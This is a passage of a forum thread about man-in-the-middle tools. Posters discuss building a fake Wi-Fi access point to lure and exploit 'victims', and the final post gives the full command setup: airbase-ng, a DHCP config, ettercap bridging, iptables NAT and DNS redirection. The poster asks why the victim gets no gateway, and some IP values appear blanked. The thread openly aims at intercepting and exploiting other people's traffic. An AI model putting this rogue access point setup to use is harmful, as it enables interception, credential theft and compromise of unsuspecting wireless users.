Page 2 of 2 FirstFirst 12
Results 11 to 13 of 13

Thread: MITM attack tools !

  1. #11
    Junior Member
    Join Date
    Oct 2008


    Quote Originally Posted by hm2075 View Post
    no probs, i already had it open cuz i was working on the wireless key grabber o it's only a slight deviation

    maybe next weekend i'll re do the transparency fake access point for bt4,

    it's much easier in bt4, have a bit more experience with ubuntu
    That's fantastic hm2075...Give it a try in bt4 and let us know further !

    Do you know whether karmetaspoilt works exactly in the same way as

    airbase + iptables + dhcpd ?

    only that karmetaspoilt is a framework offering all these functionalities!

    Because I was going to use KARMETASPOILT as a first option to set up my MITM AP...but once I had discovered your tutorial it was a lot easier for me because of the reason that everything was explained clearly.

    I think indeed KARMETASPOILT is a very sophisticated tool that provides many services but I didn't use that because I couldn't find any help!

    I wish you Good Luck with your Wireless key Grabber !

    Give as a shout when you are done !

  2. #12
    Join Date
    Feb 2010


    did use karmetasploit but it's not exactly what I wanted,

    My projects were as follows

    (1) Create a fake access point that allows the victim to successfully surf the internet whilst you try and exploit him

    if no exploit works then we redirect him to our localhost and host a few exploits there

    then the project moved onto grabbing the wireless key which was great fun setting up

    it all depends on what you want in the end. It's fun learning

    ps: the wireless key grabber setup for bt4 was done a few days ago, it's in the wireless section

  3. #13
    Junior Member
    Join Date
    Oct 2008


    I will defenetely look at your new project because it's of my interests.

    I am more interesting in the idea of Fake AP' s.

    Besides I have tested the Fake AP project in Backtrack 4 under Virtual Box in my network ! I use the ALFA AWUS036 rt8187l usb card. Unfortunately I am a little unlucky the whole thing didn't work exactly as it was intended to work.

    The creation of the fake AP (wonderful worked) , the connectivity of the victim to the fake AP (again it worked fine), DHCP worked as well and the victim device was getting an IP address. The only problem I had with it was the default gateway. The victim device couldn't see the default gateway so it was obvious that no internet connectivity was offered to the victim device.

    Below I will explain clearly how I 've done everything, which commands were used and hopefully at end you or someone else can help me out figuring out were the problem might be!

    My current network setup is as follow

    I have an old wireless D-Link router (DI-624) . It's WAN port is connected directly to the modem which modem is connected to the ISP for my internet connection.

    The other 4-port LAN switch ports are used as follow

    1st: Connected to my laptop NIC which is bridged over Virtual Box so I can have internet connection in BT4 under Virtual Box.

    The 2nd - 4th ports are not used.

    My network addressing scheme is as follow:

    I am using the default ip address for my router (I know is a bad idea) which is

    The subnet mask of my network is

    Default gateway the same as the router ip address (

    STATIC DHCP is used in my network so each device in my network has been assigned in the DHCP table with it's MAC address. So any other device that needs access it's MAC address needs first to be configured in the DHCP table. (All that makes sense I am using wired MAC filtering)

    bt~# ifconfig

    eth0 Link encap:Ethernet HWaddr 08:00:27:66:72:b1
    inet addr: Bcast: Mask:
    inet6 addr: fe80::a00:27ff:fe66:72b1/64 Scope:Link
    RX packets:3467 errors:0 dropped:0 overruns:0 frame:0
    TX packets:425 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:1320920 (1.3 MB) TX bytes:94682 (94.6 KB)
    Interrupt:19 Base address:0xc020

    lo Link encap:Local Loopback
    inet addr: Mask:
    inet6 addr: ::1/128 Scope:Host
    UP LOOPBACK RUNNING MTU:16436 Metric:1
    RX packets:106 errors:0 dropped:0 overruns:0 frame:0
    TX packets:106 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:5300 (5.3 KB) TX bytes:5300 (5.3 KB)
    Below I all the commands are shown that I've used for the Fake AP project

    Creating & starting the Fake AP

    bt~# airmon-ng start wlan0

    Interface Chipset Driver

    wlan0 RTL8187 rtl8187 - [phy0]
    (monitor mode enabled on mon2)
    mon0 RTL8187 rtl8187 - [phy0]
    mon1 RTL8187 rtl8187 - [phy0]
    bt~#airbase-ng -e "Backtrack 3" wlan0 -v

    22:42:45 Created tap interface at0
    22:42:45 Trying to set MTU on at0 to 1500
    22:42:45 Access Point with BSSID 00:C0:CA:1B:6B:83 started.
    22:42:46 Got broadcast probe request from 00:21:63:xx:xx:xx
    22:42:47 Got broadcast probe request from 00:1F:3B:xx:xx:xx
    22:42:47 Got broadcast probe request from 00:1F:3B:xx:xx:xx
    My dhcp ( /etc/dhcp3/dhcpd.conf) configuration file modifications

    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;

    subnet netmask {
    option routers;
    option subnet-mask;
    option broadcast-address;
    option domain-name-servers;
    range dynamic-bootp;
    Configuring the virtual interface

    bt~# ifconfig at0 up
           ifconfig at0 netmask
           ifconfig at0 mtu 1500
           ettercap -Tq -B eth0 -i at0
           route add -net netmask gw
    IP tables configuration

    bt~# iptables --flush
            iptables --table nat --flush
            iptables --delete-chain
            iptables --table nat --delete-chain
            echo 1 > /proc/sys/net/ipv4/ip_forward
            iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to
            iptables -P FORWARD ACCEPT
            iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
            iptables --append FORWARD --in-interface at0 -j ACCEPT
    Killing and starting DHCP server

    bt~# killall dhcpd    (I don't know if this is a correct command to use in BT4)
           /etc/init.d/dhcp3-server restart
    The problem i experience (for not getting some bits of it working)is written somewhere on the top of my post.It was long i know....but it was worth. It will be also useful for others!

    So anyone willing to help me out solving the issues I am having?

    Thank you very much !

Page 2 of 2 FirstFirst 12

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts